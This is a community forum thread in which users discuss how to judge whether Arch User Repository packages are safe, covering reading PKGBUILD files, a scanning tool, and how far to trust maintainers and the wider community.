How to check if AUR package is safe?

I don’t use many programs from AUR but there are some.
Usually I use packages with good reputation.
For example Microsoft Core Fonts
Many votes and quite popular.

But there are some more “exotic” programs like Airnef [can be used to download pictures from Nikon cameras by WiFi)
that are not very popular.

I’m aware that I can check PKGBUILD file but I’m not sure what to look for.
Is the source the most important part? And correct me if I’m wrong but even if the source link is correct then I would check the source code of the software right?

So without programming language knowledge is it even possible to be check the software?

1 Like

No. It’s like if you ask “without knowing Chinese, can I read Chinese?”
In this case, you need to rely on other and hope someone checked the source code. I’m not aware of any bad behaving apps available on the AUR, and if so then the community would probably notice and report the AUR package.

Basically yes, sometimes additional files can be made too along with the source.

5 Likes

When using AUR you really should be aware that’s always at your own risk. Checking the PKGBUILD won’t provide 100% safety. Nevertheless, I like to mention that there is a nice tool called aura which scans the PKGBUILD for obvious issues:

https://fosskers.github.io/aura/security.html

5 Likes

Looking at the pkgbuild if you can understand it will make you confident that the package maintainer don’t do anything malicious, or in a wrong way to bork your system.
After to trust the software itself, there is nothing
to help you by looking at the pkgbuild (like as for repos package) if it’s the reputation of the software itself on the net or to read all the code yourself.

Very good question. I have often asked myself the same.
Maybe someone has some helpful information in the future.

Thx for this:


:+1:

I’ll take a look at that.

2 Likes

Me too, and…
I’ll install it from aur :upside_down_face:

1 Like

@860lacov:

This here is probably the best that can be said about the AUR. PKGBUILD and makepkg are well documented, and you don’t need to have a doctorate in CS to understand what is going on, and even what should raise red flags in a PKGBUILD.

If you’re really that worried (to the point of thinking that you need to audit source code for an AUR package), what do you think about the core binary packages [3] that are updated every time you answer “Y” when doing a pacman -Syu?

Finally, a little food for thought:

If I was going to go all malicious on an AUR package, I’d go for for the more popular packages…more exposure, as it were. :slight_smile:

[1] grazzolini

[2] [aur-general] acroread package compromised

[3] pacman -Sl core|grep installed

1 Like

That’s why I use pikaur and I check what is in PKGBUILD files.

To be honest it’s the matter of faith :smiley:
I just hope that so many people use linux (Manjaro it this case) so it is quite safe.
I know how to install system and maintain it. Manjaro and Arch too. I don’t use any weird sites as a software source but…
if developers of Manjaro or any other system would like to put something inside. Like a script to send my data from the pc to somewhere. I would not know about data leaks.
[sorry for my English]

Your English is fine, my friend. :+1:

Sometimes it might be a matter of faith; however, I believe that there are plenty of really, really smart people on the internet, and more likely than not…the kinds of trickery you describe would be caught (and exposed) in fairly short order.